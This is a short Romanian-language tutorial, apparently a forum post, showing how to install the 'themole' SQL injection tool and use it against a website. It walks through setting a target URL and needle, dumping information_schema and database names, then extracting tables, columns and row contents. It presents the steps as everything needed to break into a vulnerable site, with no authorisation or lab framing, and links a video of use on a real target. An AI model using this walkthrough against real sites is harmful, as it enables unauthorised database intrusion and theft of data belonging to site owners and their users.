Vreau sa va arat un tool de sql injection mai simplist facut de un argentinian

1.  
2. Vreau sa va arat un tool de sql injection mai simplist facut de un argentinian care foloseste putin diferit metoda obisnuita de SQLi. Toti pasii de care aveti nevoie pentru a instala scriptul si pentru a patrunde intr-un site vulnerabil sunt aici.
3.  
4.  
5. apt-get update
6. apt-get install themole
7.  
8. Dupa ce l-ati instalat, putem acum sa intram in program:
9.  
10. themole
11.  
12. Sa alegem tinta si sa injectam un parametru pe care il vedem pe site, deobicei butonul "Home".
13.  
14. url http://example.com/php?id=1
15. needle home
16. schemas
17.  
18. La acest punct am injectat si am cerut sa ne fie data information_schema'ul plus numele bazelor de date, dupa care vom incerca sa extragem numele tabelurilor, coloanelor si al randurilor.
19.  
20. tables nume_baza_de_date
21. columns nume_baza_de_date nume_coloana
22. query nume_baza_de_date nume_coloana nume_rand1,nume_rand2,etc.
23.  
24. Pentru a vedea exact cum este folosit tool'ul pe un target adevarat, puteti viziona urmatorul videoclip de youtube:
25.  
26. https://www.youtube.com/watch?v=9Rrrm0JsLVw